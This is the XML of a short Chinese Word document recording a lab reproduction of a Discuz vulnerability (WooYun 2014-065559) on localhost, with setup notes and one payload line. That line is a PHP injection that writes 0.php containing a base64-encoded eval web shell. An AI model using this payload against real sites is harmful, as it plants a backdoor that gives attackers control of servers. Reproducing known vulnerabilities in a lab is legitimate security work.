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185" w:rsidRDefault="00C83FD7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27D19" w:rsidRDefault="00F27D19">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>安装完成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（跟大部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架安装方式一样）</w:t>
      </w:r>
      <w:r w:rsidR="00581491">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，进入后台</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27D19" w:rsidRDefault="00F27D19">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74500759" wp14:editId="4BB6F81E">
            <wp:extent cx="5274310" cy="2698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40E" w:rsidRDefault="00ED540E"/>
    <w:p w:rsidR="00ED540E" w:rsidRDefault="00ED540E">
      <w:r>
        <w:t>漏洞重现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED540E" w:rsidRDefault="00DA3C55">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00A35738">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://www.wooyun.org/bugs/wooyun-2014-065559</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DA3C55" w:rsidRDefault="00DA3C55"/>
    <w:p w:rsidR="00DA3C55" w:rsidRDefault="00DA3C5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A3C55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http://localhost/discuz/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#&lt;?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4='));?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A2E3E" w:rsidRDefault="008A2E3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A2E3E" w:rsidRDefault="008A2E3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A2E3E" w:rsidRDefault="008A2E3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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admin.php</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="008A2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F2"/>
    <w:rsid w:val="001520F2"/>
    <w:rsid w:val="00372185"/>
    <w:rsid w:val="00581491"/>
    <w:rsid w:val="008A2E3E"/>
    <w:rsid w:val="00AB7F9A"/>
    <w:rsid w:val="00C83FD7"/>
    <w:rsid w:val="00DA3C55"/>
    <w:rsid w:val="00ED540E"/>
    <w:rsid w:val="00EE3C7C"/>
    <w:rsid w:val="00F2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D1F36-33A0-496D-A7D9-EB57E4D9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3C55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A3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ooyun.org/bugs/wooyun-2014-06555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linpeng</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>linpeng</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-09-14T14:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-09-14T15:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>